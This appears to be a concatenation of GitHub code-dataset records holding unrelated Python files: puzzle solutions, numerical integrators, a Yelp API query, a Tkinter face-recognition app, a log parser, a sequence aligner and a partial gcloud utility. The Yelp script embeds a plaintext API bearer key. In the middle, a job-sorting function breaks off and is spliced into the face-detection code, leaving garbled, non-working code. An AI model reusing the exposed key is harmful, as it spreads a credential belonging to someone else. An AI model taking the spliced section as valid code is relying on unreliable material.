14\n94: 20\n96: 18\n98: 17'''\n# a='''0: 3\n# 1: 2\n# 4: 4\n# 6: 4'''\nmaxes = 
Counter()\nfor i in a.split(\"\\n\"):\n cur = i.split(\": \")\n maxes[int(cur[0])] = int(cur[1])\nprint(maxes)\nposes = Counter()\ndirections = Counter()\nfor i in range(max(list(maxes.keys()))+1):\n if i not in maxes:\n maxes[i] = 0\n else:\n directions[i] = 1\n poses[i] = 0\n\nprint(poses)\ncurX = 0\ncurY = 0\ntimestep = 0\nhitSpots = []\ncaught = True\nwhile caught or curX != max(list(poses.keys())) + 1:\n if not caught:\n curX += 1\n print(\"new curX\", curX)\n\n if maxes[curX] != 0 and poses[curX] == curY:\n caught = True\n print(\"caught and added\", curX, maxes[curX])\n hitSpots.append(curX * maxes[curX])\n else:\n caught = False\n # caught is cleared again unconditionally, so the while-condition effectively only tracks curX\n caught = False\n\n for i in poses:\n if maxes[i] != 0:\n if poses[i] + directions[i] >= maxes[i]:\n directions[i] = -directions[i]\n elif poses[i] + directions[i] < 0:\n directions[i] = -directions[i]\n \n poses[i] += directions[i]\n\n timestep += 1\n print(\"curX\", curX)\n print(\"poses\", poses)\n\nprint(hitSpots)\nprint(sum(hitSpots))\n#part 1 done in 51:11 due to error in bouncing code","repo_name":"Goldenlion5648/AdventOfCode2017","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13021092179","text":"import numpy as np\n\n# Define the EULER solver function\ndef EULER(derivative, R, t, h, Iext, Istim, Isyn):\n \"\"\"\n Computes the next value of the neural activity R using the Euler method.\n\n Parameters\n ----------\n derivative : function\n The derivative function that computes the rate of change of R with respect to time.\n R : int, float, or ndarray\n The current value of R.\n t : int or float\n The current time.\n h : int or float\n The time step.\n Iext : int or float\n External input.\n Istim : int or float\n Stimulus input.\n Isyn : int, float, or ndarray\n Synaptic input.\n\n Returns\n -------\n int, float, or ndarray\n The next value of R.\n \"\"\"\n # forward Euler evaluates the derivative at the current time and state\n return R + h * derivative(t, R, Iext, Istim, Isyn)\n\n\n# Define the RK4 solver function\ndef RK4(derivative, R, t, h, Iext, Istim, Isyn):\n \"\"\"\n Computes the next value of the neural activity R using the fourth-order Runge-Kutta method.\n\n Parameters\n ----------\n derivative : function\n The derivative function that computes the rate of change of R with respect to time.\n R : int, float, or ndarray\n The current value of R.\n t : int or float\n The current time.\n h : int or float\n The time step.\n Iext : int or float\n External input.\n Istim : int or float\n Stimulus input.\n Isyn : int, float, or ndarray\n Synaptic input.\n\n Returns\n -------\n int, float, or ndarray\n The next value of R.\n \"\"\"\n k1 = derivative(t, R, Iext, Istim, Isyn)\n # the intermediate states must be scaled by the step size h for a correct RK4 update\n k2 = derivative(t + h / 2, R + h * k1 / 2, Iext, Istim, Isyn)\n k3 = derivative(t + h / 2, R + h * k2 / 2, Iext, Istim, Isyn)\n k4 = derivative(t + h, R + h * k3, Iext, Istim, Isyn)\n return R + (h / 6) * (k1 + 2 * k2 + 2 * k3 + k4)\n\n\ndef config_simulation(integration, tsim, h):\n \"\"\"\n Configure a simulation of a dynamical system with a 
specified integration method.\n\n Args:\n - integration: str, the name of the integration method to use; either \"euler\" or \"rk4\"\n - tsim: float, the total simulation time in seconds\n - h: float, the time step size in seconds\n\n Returns:\n - fint: callable, the integration function corresponding to the specified integration method\n - steps: int, the number of time steps in the simulation\n - times: numpy.ndarray, an array of times corresponding to each time step in the simulation\n \"\"\"\n assert integration in [\"euler\", \"rk4\"]\n\n # Get integration function\n fint = dict(euler=EULER, rk4=RK4)[integration]\n\n tinit = 0.0\n # Number of time steps\n steps = int((tsim - tinit) / h) # Number of steps\n times = np.linspace(tinit, tsim, steps)\n\n return fint, steps, times\n","repo_name":"brainets/IPP_PAPER","sub_path":"src/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33412147510","text":"#!/usr/bin/env python3\n\n\"\"\"\nSend contents to server.\n\"\"\"\n\nfrom subprocess import check_call\nfrom urllib.parse import urljoin\nfrom shlex import split\nimport argparse\nimport logging\n\n\nfrom conf import __version__ as VERSION\n\nDOC_DESTINATION = (\"/dev/null\")\n\n\ndef norm_perms():\n \"\"\"\n Normalize permissions in the build directory.\n \"\"\"\n cmd = split(\"find _build/html/ -type d -exec chmod o+x '{}' ';'\")\n check_call(cmd)\n cmd = split(\"chmod -R o+r _build/html/\")\n check_call(cmd)\n\n\ndef send_static(destination=DOC_DESTINATION):\n \"\"\"\n Send static site on server.\n \"\"\"\n logger = logging.getLogger(__name__)\n cmd = split(\"rsync -av _build/html/\")\n dest = urljoin(destination, VERSION)\n logger.info(\"Sending documentation to %s\", dest)\n cmd += [dest]\n check_call(cmd)\n\n\ndef main():\n \"\"\"\n Command line entry point.\n \"\"\"\n logging.basicConfig(level=logging.DEBUG)\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--destination',\n action='store',\n default=DOC_DESTINATION,\n help=\"Where the static version of the documentation \"\n \"will be sent, \"\n \"default={}\".format(DOC_DESTINATION))\n args = parser.parse_args()\n norm_perms()\n send_static(destination=args.destination)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"crim-ca/Service","sub_path":"docs/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"72936547104","text":"import requests\n\nurl = \"https://api.yelp.com/v3/businesses/search\"\napi_key = \"8gxaaO6mptFNjNnoPCP0_lyjlK7VnkpH0QLNncycGCvk44X-MxrEKOPa0l_LUT1WcaztHeyc8rddihg4_OrPEwWIiBcl1OsrqsKTG9R0_AqczdPKv9J-LUAvsLbvZHYx\"\nheaders = {\n \"Authorization\": \"Bearer \" + api_key\n}\nparams = {\n \"term\": \"Barber\",\n \"location\": \"NYC\",\n}\nresponse = requests.get(url, headers=headers, params=params)\nbusinesses = response.json()[\"businesses\"]\n\nnames = [business[\"name\"]\n for business in businesses if business[\"rating\"] > 4.5]\n\n\nprint(names)\n","repo_name":"VelasquezTracy25/python","sub_path":"HelloWorld/python_packages/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16374072269","text":"# Python Exercise 084: Write a program that reads the name and weight of several people,\n# 
keeping everything in a list. At the end, show:\n# A) How many people were registered.\n# B) A list of the heaviest people.\n# C) A list of the lightest people.\n\nnome = []\npeso = []\nwhile True:\n n = str(input('Nome: '))\n p = int(input('Peso: '))\n nome.append(n)\n peso.append(p) # keep the weight too, so parts B) and C) can be answered\n\n resp = str(input('Quer continuar [S/N]? ')).strip()\n if resp in 'Nn':\n break\n# A) number of people registered\nprint(f'{len(nome)} pessoa(s) cadastrada(s).')\n# B) everyone whose weight equals the maximum\nprint('Mais pesados:', [nome[i] for i, v in enumerate(peso) if v == max(peso)])\n# C) everyone whose weight equals the minimum\nprint('Mais leves:', [nome[i] for i, v in enumerate(peso) if v == min(peso)])\n","repo_name":"Emerson007700/Python_exercicios","sub_path":"ex_84.py","file_name":"ex_84.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"36079677874","text":"# Sort the jobs by time in descending order\r\ndef sort_works(a = [],b = []):\r\n for i in range(len(a)):\r\n for j in range(i+1,len(a)):\r\n if a[i] 0):\r\n (x, y, w, h) = detections[0]\r\n frame = cv.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n\r\n cv.imshow('Face Detection', frame)\r\n\r\n if cv.waitKey(1) & 0xFF == ord('d'):\r\n break\r\n\r\n capture.release()\r\n cv.destroyAllWindows()\r\n\r\n\r\ndef face_Recognition():\r\n upload2()\r\n\r\n path = 'Face_Recognition/images'\r\n images = []\r\n names = []\r\n myList = os.listdir(path)\r\n\r\n for i in myList:\r\n currentImg = cv.imread(f'{path}/{i}')\r\n images.append(currentImg)\r\n names.append(os.path.splitext(i)[0])\r\n\r\n def encodings(images):\r\n encoding_list = []\r\n for i in images:\r\n i = cv.cvtColor(i, cv.COLOR_BGR2RGB)\r\n encode = fr.face_encodings(i)[0]\r\n encoding_list.append(encode)\r\n return 
encoding_list\r\n\r\n encoding_list_known = encodings(images)\r\n\r\n capture = cv.VideoCapture(0)\r\n\r\n while True:\r\n isTrue, frame = capture.read()\r\n\r\n frame_small = cv.resize(frame, (0, 0), None, 0.25, 0.25)\r\n frame_small = cv.cvtColor(frame_small, cv.COLOR_BGR2RGB)\r\n\r\n face_loc_frame = fr.face_locations(frame_small)\r\n encode_frame = fr.face_encodings(frame_small, face_loc_frame)\r\n\r\n for encodeFace, locFace in zip(encode_frame, face_loc_frame):\r\n matches = fr.compare_faces(encoding_list_known, encodeFace)\r\n faceDis = fr.face_distance(encoding_list_known, encodeFace)\r\n\r\n matchIndex = np.argmin(faceDis)\r\n\r\n if matches[matchIndex]:\r\n name = names[matchIndex].upper()\r\n y1, x2, y2, x1 = locFace\r\n y1, x2, y2, x1 = y1*4, x2*4, y2*4, x1*4\r\n\r\n cv.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 2)\r\n cv.rectangle(frame, (x1, y2+37), (x2, y2), (0, 255, 0), -1)\r\n cv.putText(frame, name, (x1+6, y2+30),\r\n cv.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 2)\r\n markAttendance(name)\r\n\r\n cv.imshow('Mark Attendance', frame)\r\n if cv.waitKey(1) & 0xFF == ord('d'):\r\n break\r\n\r\n capture.release()\r\n cv.destroyAllWindows()\r\n\r\n\r\ndef object_Detection():\r\n upload4()\r\n\r\n config_file = 'Object_Detection/ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt'\r\n frozen_model = 'Object_Detection/frozen_inference_graph.pb'\r\n\r\n model = cv.dnn_DetectionModel(frozen_model, config_file)\r\n\r\n classLabels = []\r\n file_name = 'Object_Detection/Labels.txt'\r\n with open(file_name, 'rt') as fpt:\r\n classLabels = fpt.read().rstrip('\\n').split('\\n')\r\n\r\n model.setInputSize(320, 320)\r\n model.setInputScale(1.0/127.5)\r\n model.setInputMean((127.5, 127.5, 127.5))\r\n model.setInputSwapRB(True)\r\n\r\n capture = cv.VideoCapture('Object_Detection/Object_Detection_Video.mp4')\r\n\r\n def rescaleFrame(frame, scale=0.25):\r\n width= int(frame.shape[1] * scale)\r\n height = int(frame.shape[0] * scale)\r\n\r\n dimensions = (width, height)\r\n\r\n return cv.resize(frame, dimensions, interpolation=cv.INTER_AREA)\r\n\r\n while True:\r\n isTrue, frame = capture.read()\r\n\r\n frame_resized = rescaleFrame(frame, scale=0.25)\r\n \r\n ClassIndex, confidece, bbox = model.detect(frame_resized, confThreshold=0.55)\r\n\r\n if (len(ClassIndex) != 0):\r\n for ClassInd, conf, boxes, in zip(ClassIndex.flatten(), confidece.flatten(), bbox):\r\n if(ClassInd <= 80):\r\n cv.rectangle(frame_resized, boxes, (255, 0, 0), 2)\r\n cv.putText(frame_resized, classLabels[ClassInd-1], (boxes[0] + 10,\r\n boxes[1] + 30), cv.FONT_HERSHEY_PLAIN, 3, (0, 255, 0))\r\n\r\n cv.imshow('Object Detection', frame_resized)\r\n\r\n if cv.waitKey(1) & 0xFF == ord('d'):\r\n break\r\n\r\n capture.release()\r\n cv.destroyAllWindows()\r\n\r\n\r\ndef open_Excel_Sheet():\r\n os.startfile('Attendance_Sheet.csv')\r\n\r\n\r\ndef upload1():\r\n import time\r\n statusvar1.set(\"Loading.\")\r\n sbar1.update()\r\n time.sleep(0.5)\r\n statusvar1.set(\"Loading..\")\r\n sbar1.update()\r\n time.sleep(0.5)\r\n statusvar1.set(\"Loading...\")\r\n sbar1.update()\r\n time.sleep(0.5)\r\n statusvar1.set(\"Hold On!\")\r\n sbar1.update()\r\n statusvar1.set(\"\")\r\n\r\n\r\ndef upload2():\r\n import time\r\n statusvar2.set(\"Loading.\")\r\n sbar2.update()\r\n time.sleep(0.5)\r\n statusvar2.set(\"Loading..\")\r\n sbar2.update()\r\n time.sleep(0.5)\r\n statusvar2.set(\"Loading...\")\r\n sbar2.update()\r\n time.sleep(0.5)\r\n statusvar2.set(\"Hold On!\")\r\n sbar2.update()\r\n statusvar2.set(\"\")\r\n\r\n\r\ndef upload3():\r\n import 
time\r\n statusvar3.set(\"Loading.\")\r\n sbar3.update()\r\n time.sleep(0.5)\r\n statusvar3.set(\"Loading..\")\r\n sbar3.update()\r\n time.sleep(0.5)\r\n statusvar3.set(\"Loading...\")\r\n sbar3.update()\r\n time.sleep(0.5)\r\n statusvar3.set(\"Hold On!\")\r\n sbar3.update()\r\n statusvar3.set(\"\")\r\n\r\n\r\ndef upload4():\r\n import time\r\n statusvar4.set(\"Loading.\")\r\n sbar4.update()\r\n time.sleep(0.5)\r\n statusvar4.set(\"Loading..\")\r\n sbar4.update()\r\n time.sleep(0.5)\r\n statusvar4.set(\"Loading...\")\r\n sbar4.update()\r\n time.sleep(0.5)\r\n statusvar4.set(\"Hold On!\")\r\n sbar4.update()\r\n statusvar4.set(\"\")\r\n\r\n\r\nroot = Tk()\r\nroot.geometry(\"1000x600\")\r\nroot.maxsize(1000, 600)\r\nroot.minsize(1000, 600)\r\nroot.title(\"Face Recognition And Detecting Features\")\r\nroot.configure(bg=\"#8646f1\")\r\n\r\nheading1 = Label(root, text=\"FACE RECOGNITION & DETECTION FEATURES\",\r\n bg=\"#8646f1\", fg=\"#ededed\", font=\"tahoma 30 bold\")\r\nheading1.pack(side=TOP, pady=(40, 5))\r\nheading2 = Label(root, text=\"Made By: Akriti & Anurag\",\r\n bg=\"#8646f1\", fg=\"#ededed\", font=\"tahoma 20 bold\")\r\nheading2.pack(side=TOP, pady=(5, 0))\r\n\r\nframe1 = Frame(root, bg=\"#ededed\", padx=5, pady=5)\r\nname1 = Label(frame1, fg=\"#722ce1\", bg=\"#ededed\",\r\n text=\"FACE DETECTION\", font=\"lucida 12 bold\")\r\nname1.pack(pady=(15, 10))\r\ntext1 = Label(frame1, width=25, height=8, fg=\"black\", bg=\"#ededed\",\r\n text=\"This will help you to detect\\nfaces in live video supported\\nby webcam.\", font=\"verdana 10\")\r\ntext1.pack(pady=10)\r\nstatusvar1 = StringVar()\r\nstatusvar1.set(\"\")\r\nsbar1 = Label(frame1, textvariable=statusvar1, bg=\"#ededed\",\r\n fg=\"#722ce1\", font=\"tahoma 10 bold\", pady=5)\r\nsbar1.pack(side=BOTTOM, fill=X)\r\nbutton1 = Button(frame1, width=16, bg=\"#8846f1\", fg=\"#ededed\", text=\"Click to Enter\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=face_Detection)\r\nbutton1.pack(side=BOTTOM)\r\nframe1.pack(side=LEFT, padx=20)\r\n\r\nframe2 = Frame(root, bg=\"#ededed\", padx=5, pady=5)\r\nname2 = Label(frame2, fg=\"#722ce1\", bg=\"#ededed\",\r\n text=\"FACE RECOGNITION\", font=\"lucida 12 bold\")\r\nname2.pack(pady=(15, 10))\r\ntext2 = Label(frame2, width=25, height=8, fg=\"black\", bg=\"#ededed\",\r\n text=\"This will help you to recognise\\nfaces in live video supported\\nby webcam.\", font=\"verdana 10\")\r\ntext2.pack(pady=10)\r\nstatusvar2 = StringVar()\r\nstatusvar2.set(\"\")\r\nsbar2 = Label(frame2, textvariable=statusvar2, bg=\"#ededed\",\r\n fg=\"#722ce1\", font=\"tahoma 10 bold\", pady=5)\r\nsbar2.pack(side=BOTTOM, fill=X)\r\nbutton2 = Button(frame2, width=16, bg=\"#8846f1\", fg=\"white\", text=\"Click to Enter\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=face_Recognition)\r\nbutton2.pack(side=BOTTOM)\r\nframe2.pack(side=LEFT, padx=20)\r\n\r\nframe3 = Frame(root, bg=\"#ededed\", padx=5, pady=5)\r\nname3 = Label(frame3, fg=\"#722ce1\", bg=\"#ededed\",\r\n text=\"ATTENDANCE SYSTEM\", font=\"lucida 12 bold\")\r\nname3.pack(pady=(15, 10))\r\ntext3 = Label(frame3, width=22, height=5, fg=\"black\", bg=\"#ededed\",\r\n text=\"This will help you recognise\\nface of a person and mark\\nattendance of that person\\n in an excel sheet.\", font=\"verdana 10\")\r\ntext3.pack(pady=10)\r\nstatusvar3 = StringVar()\r\nstatusvar3.set(\"\")\r\nsbar3 = Label(frame3, textvariable=statusvar3, bg=\"#ededed\",\r\n fg=\"#722ce1\", font=\"tahoma 10 bold\", pady=5)\r\nsbar3.pack(side=BOTTOM, fill=X)\r\nbutton3 = Button(frame3, width=16, 
bg=\"#8846f1\", fg=\"white\", text=\"Click to Enter\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=mark_Attendance)\r\nbutton3.pack(side=BOTTOM)\r\nbutton_extra = Button(frame3, width=16, bg=\"#8846f1\", fg=\"white\", text=\"Open Excel Sheet\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=open_Excel_Sheet)\r\nbutton_extra.pack(side=BOTTOM, pady=5)\r\nframe3.pack(side=LEFT, padx=20)\r\n\r\nframe4 = Frame(root, bg=\"#ededed\", padx=5, pady=5)\r\nname3 = Label(frame4, fg=\"#722ce1\", bg=\"#ededed\",\r\n text=\"OBJECT DETECTION\", font=\"lucida 12 bold\")\r\nname3.pack(pady=(15, 10))\r\ntext4 = Label(frame4, width=22, height=8, fg=\"black\", bg=\"#ededed\",\r\n text=\"This will detect objects\\nfrom a video.\", font=\"verdana 10\")\r\ntext4.pack(pady=10)\r\nstatusvar4 = StringVar()\r\nstatusvar4.set(\"\")\r\nsbar4 = Label(frame4, textvariable=statusvar4, bg=\"#ededed\",\r\n fg=\"#722ce1\", font=\"tahoma 10 bold\", pady=5)\r\nsbar4.pack(side=BOTTOM, fill=X)\r\nbutton4 = Button(frame4, width=16, bg=\"#8846f1\", fg=\"white\", text=\"Click to Enter\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=object_Detection)\r\nbutton4.pack(side=BOTTOM)\r\nframe4.pack(side=LEFT, padx=20)\r\n\r\nroot.mainloop()\r\n","repo_name":"akritibhan/Face-Detection-and-Recognition-final","sub_path":"FINAL.py","file_name":"FINAL.py","file_ext":"py","file_size_in_byte":12317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5983920279","text":"#!/usr/bin/python3\n\"\"\"Log parsing Task\"\"\"\nimport sys\nimport re\n\n\nif __name__ == \"__main__\":\n value_dict = {}\n file_size = 0\n count = 0\n\n def check_pattern(pattern):\n \"\"\"Check that pattern matches\"\"\"\n status_list = [200, 301, 400, 401, 403, 404, 405, 500]\n split_list = pattern.split(\" \")\n\n # Check if size and codes fit values\n try:\n size = split_list[-1]\n code = split_list[-2]\n if (int(code) not in status_list):\n code = 0\n except (ValueError, IndexError):\n code = 0\n\n # Check for integer value of size\n try:\n size = int(size)\n except ValueError:\n return False\n\n return [code, int(size)]\n\n def print_result():\n \"\"\"Print results\"\"\"\n print('File size: {}'.format(file_size))\n sort_data = dict(sorted(value_dict.items()))\n for key, value in sort_data.items():\n print('{}: {}'.format(key, value))\n\n try:\n for line in sys.stdin:\n result = check_pattern(line)\n if (result is not False and result[0] == 0):\n file_size += result[1]\n elif (result is not False and result[0] != 0):\n count = count + 1\n value_dict[result[0]] = value_dict.get(result[0], 0) + 1\n file_size += result[1]\n if (count == 10):\n count = 0\n print_result()\n else:\n pass\n print_result()\n except (KeyboardInterrupt, EOFError):\n print_result()\n","repo_name":"adeyemodanointed/alx-interview","sub_path":"0x03-log_parsing/0-stats.py","file_name":"0-stats.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40198202379","text":"from typing import Tuple, List\n\nfrom Bio import SeqIO, Seq\nfrom Bio.pairwise2 import align, format_alignment\nfrom Bio.SubsMat import MatrixInfo\n\n# sequence of nucleotides (over alphabet Σ = {A, C, G, T}).\nSequenceN = str\n\n# sequence of amino acids.\nSequenceAA = str\n\n# local alignment, as returned by Bio.pairwise2.alignXX function\nLocalAlignment = Tuple[str, str, float, int, int]\n\n\nclass SequenceTranslation:\n \"\"\"\n Sequence represented as both 
nucleotides and amino acids.\n \"\"\"\n\n def __init__(self, seq_n: SequenceN, seq_aa: SequenceAA = None):\n self.seq_n = seq_n\n self.seq_aa = Seq.translate(seq_n) if seq_aa is None else seq_aa\n\n def split(self) -> List['SequenceTranslation']:\n \"\"\"\n List of sequences split by \"*\" char in amino acidic representation.\n In special case of original sequence not having \"*\" char, returns a singleton of itself.\n \"\"\"\n seq_aa = self.seq_aa\n seq_n = self.seq_n\n ret = []\n pos = None\n\n while pos != -1:\n pos = seq_aa.find(\"*\")\n\n if pos == -1:\n if len(seq_aa) > 0:\n new_seq = SequenceTranslation(seq_n, seq_aa)\n ret.append(new_seq)\n else:\n new_seq_aa = seq_aa[:pos]\n new_seq_n = seq_n[:3 * pos]\n if len(new_seq_aa) > 0:\n new_seq = SequenceTranslation(new_seq_n, new_seq_aa)\n ret.append(new_seq)\n seq_aa = seq_aa[pos + 1:]\n seq_n = seq_n[3 * (pos + 1):]\n\n return ret\n\n\ndef possible_translations(seq: SequenceN) -> List[SequenceTranslation]:\n \"\"\"\n :return: list of all (3) possible translations, by discarding first 0, 1, or 2 nucleotides.\n \"\"\"\n\n def truncate_tail(s: SequenceN) -> SequenceN:\n \"\"\" Helper function returning truncated sequence so that len(seq) mod 3 == 0. \"\"\"\n return s if len(s) % 3 == 0 else s[:-(len(s) % 3)]\n\n return [SequenceTranslation(truncate_tail(seq[i:])) for i in range(3)]\n\n\nclass LocalAlignmentWrapper:\n \"\"\"\n Wrapper class for alignment: computing, comparing, and converting to nucleotides.\n \"\"\"\n\n def __init__(self, seq1: SequenceTranslation, seq2: SequenceTranslation,\n match_dict: dict, open_gap_penalty: float, extend_gap_penalty: float):\n self.seq1 = seq1\n self.seq2 = seq2\n\n alignments = align.localds(seq1.seq_aa, seq2.seq_aa, match_dict, open_gap_penalty, extend_gap_penalty,\n one_alignment_only=True)\n\n if len(alignments) == 0:\n self.value = float('-inf')\n else:\n _, _, self.value, _, _ = alignments[0]\n self.alignment_aa = alignments[0]\n\n def __lt__(self, other):\n if not isinstance(other, LocalAlignmentWrapper):\n return False\n else:\n return self.value < other.value\n\n def alignment_n(self) -> LocalAlignment:\n \"\"\"\n Returns the alignment but with amino acids converted back to nucleotides.\n \"\"\"\n\n def aligned_aa_to_n(seq_n: SequenceN, seq_aa_aligned: SequenceAA) -> SequenceN:\n \"\"\" Helper function returning seq_n but extended with gaps in places where seq_aa_aligned has gaps. 
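E.g. seq_n \"AAATTT\" with seq_aa_aligned \"K-F\" yields \"AAA---TTT\". 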
\"\"\"\n tmp = []\n non_gap = 0\n for i, c in enumerate(seq_aa_aligned):\n if c == '-':\n tmp.append('---')\n else:\n tmp.append(seq_n[3 * non_gap:3 * non_gap + 3])\n non_gap += 1\n\n return \"\".join(tmp)\n\n seq1_aligned_aa, seq2_aligned_aa, value, lower_bound, upper_bound = self.alignment_aa\n\n return (aligned_aa_to_n(self.seq1.seq_n, seq1_aligned_aa), aligned_aa_to_n(self.seq2.seq_n, seq2_aligned_aa),\n value, 3 * lower_bound, 3 * upper_bound)\n\n\ndef best_local_alignment(seq1_n: SequenceN, seq2_n: SequenceN,\n open_gap_penalty: float, extend_gap_penalty: float) -> LocalAlignment:\n \"\"\"\n Finds best local alignment as required in task specification.\n \"\"\"\n\n # translate sequences into amino acids (in all 3 possible ways) and split them by stop codon\n seq1_all_fragments = [subseq_t for seq_t in possible_translations(seq1_n) for subseq_t in seq_t.split()]\n seq2_all_fragments = [subseq_t for seq_t in possible_translations(seq2_n) for subseq_t in seq_t.split()]\n\n alignments = []\n for s1 in seq1_all_fragments:\n for s2 in seq2_all_fragments:\n alignment = LocalAlignmentWrapper(s1, s2,\n match_dict=MatrixInfo.blosum60,\n open_gap_penalty=open_gap_penalty,\n extend_gap_penalty=extend_gap_penalty)\n alignments.append(alignment)\n\n best_alignment = max(alignments)\n return best_alignment.alignment_n()\n\n\ndef histones():\n seqs_histones = list([s.seq._data for s in SeqIO.parse(\"histones.fa\", \"fasta\")])\n\n for i, s1 in enumerate(seqs_histones):\n for j, s2 in enumerate(seqs_histones):\n if i < j:\n alignment = best_local_alignment(s1, s2, open_gap_penalty=-1, extend_gap_penalty=-0.5)\n print(format_alignment(*alignment))\n\n\nif __name__ == '__main__':\n histones()\n","repo_name":"rotifyld/2019l-computational-biology-intro","sub_path":"labs/03/h02.py","file_name":"h02.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39892338769","text":"# Importar las bibliotecas necesarias\r\nimport multiprocessing\r\n\r\n# NOMBRE: VICTOR GABRIEL CAPIA ALI\r\n# CI: 4762494 LP\r\n# PREGUNTA 4\r\n# Con multiprocesing genera la siguiente serie 2, 2, 5, 4, 10, 6, 17,… (10000 posiciones sin restricción de procesador).\r\n\r\ndef calcular_valor(posicion):\r\n if posicion % 2 == 1:\r\n # Números impares\r\n return (posicion // 2 + 1) * (posicion // 2 + 1) + 1\r\n else:\r\n # Números pares\r\n return (posicion // 2) * 2\r\n\r\nif __name__ == '__main__':\r\n num_posiciones = 10000\r\n \r\n # Creamos un grupo de procesos\r\n pool = multiprocessing.Pool()\r\n\r\n # Generamos la serie en paralelo\r\n serie = pool.map(calcular_valor, range(1, num_posiciones + 1))\r\n\r\n # Cerramos el grupo de procesos\r\n pool.close()\r\n pool.join()\r\n\r\n print(serie)","repo_name":"Deimos7001/p4","sub_path":"P# 4/pregunta04.py","file_name":"pregunta04.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27765312959","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom apitools.base.py import list_pager\nfrom googlecloudsdk.api_lib.artifacts import exceptions as ar_exceptions\nfrom googlecloudsdk.api_lib.cloudkms import iam as kms_iam\nfrom googlecloudsdk.api_lib.cloudresourcemanager import projects_api\nfrom googlecloudsdk.api_lib.iam import util as iam_api\nfrom googlecloudsdk.api_lib.util import apis\nfrom googlecloudsdk.command_lib.iam 
import iam_util\nfrom googlecloudsdk.command_lib.projects import util as project_util\nfrom googlecloudsdk.core import resources\n\nARTIFACTREGISTRY_API_NAME = \"artifactregistry\"\nARTIFACTREGISTRY_API_VERSION = \"v1\"\n\nSTORAGE_API_NAME = \"storage\"\nSTORAGE_API_VERSION = \"v1\"\n\n_GCR_PERMISSION = \"storage.objects.list\"\n\nCRYPTO_KEY_COLLECTION = \"cloudkms.projects.locations.keyRings.cryptoKeys\"\n\nREDIRECT_PERMISSIONS = [\"storage.buckets.update\"]\n\n\ndef GetStorageClient():\n return apis.GetClientInstance(STORAGE_API_NAME, STORAGE_API_VERSION)\n\n\ndef GetStorageMessages():\n return apis.GetMessagesModule(STORAGE_API_NAME, STORAGE_API_VERSION)\n\n\ndef GetClient(skip_activation_prompt=False):\n return apis.GetClientInstance(\n ARTIFACTREGISTRY_API_NAME,\n ARTIFACTREGISTRY_API_VERSION,\n skip_activation_prompt=skip_activation_prompt,\n )\n\n\ndef GetMessages():\n return apis.GetMessagesModule(ARTIFACTREGISTRY_API_NAME,\n ARTIFACTREGISTRY_API_VERSION)\n\n\ndef GetClientV1beta2():\n return apis.GetClientInstance(ARTIFACTREGISTRY_API_NAME,\n \"v1beta2\")\n\n\ndef GetMessagesV1beta2():\n return apis.GetMessagesModule(ARTIFACTREGISTRY_API_NAME,\n \"v1beta2\")\n\n\ndef DeleteTag(client, messages, tag):\n \"\"\"Deletes a tag by its name.\"\"\"\n delete_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsDeleteRequest(\n name=tag)\n err = client.projects_locations_repositories_packages_tags.Delete(\n delete_tag_req)\n if not isinstance(err, messages.Empty):\n raise ar_exceptions.ArtifactRegistryError(\n \"Failed to delete tag {}: {}\".format(tag, err))\n\n\ndef CreateDockerTag(client, messages, docker_tag, docker_version):\n \"\"\"Creates a tag associated with the given docker version.\"\"\"\n tag = messages.Tag(\n name=docker_tag.GetTagName(), version=docker_version.GetVersionName())\n create_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsCreateRequest(\n parent=docker_tag.GetPackageName(), tag=tag, tagId=docker_tag.tag)\n return client.projects_locations_repositories_packages_tags.Create(\n create_tag_req)\n\n\ndef GetTag(client, messages, tag):\n \"\"\"Gets a tag by its name.\"\"\"\n get_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsGetRequest(\n name=tag)\n return client.projects_locations_repositories_packages_tags.Get(get_tag_req)\n\n\ndef DeleteVersion(client, messages, version):\n \"\"\"Deletes a version by its name.\"\"\"\n delete_ver_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesVersionsDeleteRequest(\n name=version)\n return client.projects_locations_repositories_packages_versions.Delete(\n delete_ver_req)\n\n\ndef DeletePackage(client, messages, package):\n \"\"\"Deletes a package by its name.\"\"\"\n delete_pkg_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesDeleteRequest(\n name=package)\n return client.projects_locations_repositories_packages.Delete(delete_pkg_req)\n\n\ndef GetVersion(client, messages, version):\n \"\"\"Gets a version by its name.\"\"\"\n client = GetClient()\n messages = 